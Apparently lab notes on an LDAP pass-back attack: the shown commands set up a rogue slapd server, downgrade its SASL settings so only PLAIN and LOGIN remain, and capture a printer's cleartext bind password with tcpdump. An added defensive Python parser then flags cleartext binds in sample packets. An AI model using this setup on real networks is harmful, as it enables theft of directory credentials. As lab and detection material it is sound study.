Rogue LDAP Server

sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
  • Omit initial configuration?: No

  • DNS domain name: target domain

  • Organization name: target domain

  • Administrator password: anything, but remember it

  • Database removed?: No

  • Move old database?: Yes

Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.

Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms so that it offers only the PLAIN and LOGIN methods. To do this, we create a new ldif file called olcSaslSecProps.ldif with the following content:

cat ./olcSaslSecProps.ldif
# olcSaslSecProps.ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
  • olcSaslSecProps: Specifies the SASL security properties

  • noanonymous: Disables mechanisms that support anonymous login

  • minssf: Specifies the minimum acceptable security strength factor; 0 means no protection is required

  • passcred: Requires mechanisms that pass the client's credentials to the server, which leaves only PLAIN and LOGIN

Update configuration

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration (the output should list only PLAIN and LOGIN under supportedSASLMechanisms)

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

Our LDAP server is now listening on port 389.

Capturing LDAP Credentials

sudo tcpdump -SX -i breachad tcp port 389
   -S
   --absolute-tcp-sequence-numbers
          Print absolute, rather than relative, TCP sequence numbers.

   -X     When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII.
          This is very handy for analysing new protocols. In the current implementation this flag may have the same effect as -XX if the packet is truncated.

From this capture we can retrieve the plaintext password that the printer service uses to bind against LDAP.
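The same capture seen from the defender's side, as an added example that is not part of the original page: a small BER parser that classifies LDAP BindRequests crossing port 389 and flags cleartext mechanisms (simple, PLAIN, LOGIN) while recording only the length of the secret, never its value. The sample packets, the DN cn=printer,dc=example,dc=com and the password in them are constructed for this example.

```python
# Added example: classify captured LDAP BindRequests and flag cleartext binds without logging the secret.
CLEARTEXT_MECHS = {"simple", "PLAIN", "LOGIN"}   # credentials travel unprotected unless TLS wraps the session

def read_tlv(buf, pos):
    """Read one BER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def inspect_bind(packet):
    """Return a finding for an LDAP BindRequest, or None for any other LDAP message."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:                          # LDAPMessage is a SEQUENCE
        return None
    _, mid, pos = read_tlv(msg, 0)           # messageID INTEGER
    tag, op, _ = read_tlv(msg, pos)
    if tag != 0x60:                          # BindRequest is [APPLICATION 0]
        return None
    _, ver, pos = read_tlv(op, 0)            # version INTEGER
    _, dn, pos = read_tlv(op, pos)           # name LDAPDN
    tag, auth, _ = read_tlv(op, pos)         # AuthenticationChoice
    if tag == 0x80:                          # simple [0] OCTET STRING
        mech, secret_len = "simple", len(auth)
    elif tag == 0xA3:                        # sasl [3] SaslCredentials
        _, mech_b, pos = read_tlv(auth, 0)   # mechanism LDAPString
        mech = mech_b.decode()
        secret_len = len(read_tlv(auth, pos)[1]) if pos < len(auth) else 0  # optional credentials
    else:
        return None
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "bind_dn": dn.decode(),
        "mechanism": mech,
        "secret_bytes": secret_len,          # length only; the secret itself is never recorded
        "cleartext": mech in CLEARTEXT_MECHS and secret_len > 0,
    }

def tlv(tag, body):                          # short-form BER encoder, only for the constructed samples
    return bytes([tag, len(body)]) + body

# Constructed samples: a simple bind and a SASL PLAIN bind, as a device doing LDAP pass-back would send them.
SIMPLE_BIND = tlv(0x30, tlv(0x02, b"\x01") + tlv(0x60, tlv(0x02, b"\x03")
    + tlv(0x04, b"cn=printer,dc=example,dc=com") + tlv(0x80, b"Sup3rSecret!")))
SASL_PLAIN = tlv(0x30, tlv(0x02, b"\x02") + tlv(0x60, tlv(0x02, b"\x03") + tlv(0x04, b"")
    + tlv(0xA3, tlv(0x04, b"PLAIN") + tlv(0x04, b"\x00printer\x00Sup3rSecret!"))))
```

The parser judges the LDAP layer only; a bind inside LDAPS or after StartTLS is not visible as cleartext, so pair the finding with the capture context (plain port 389, no StartTLS) as the tcpdump filter above already does.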
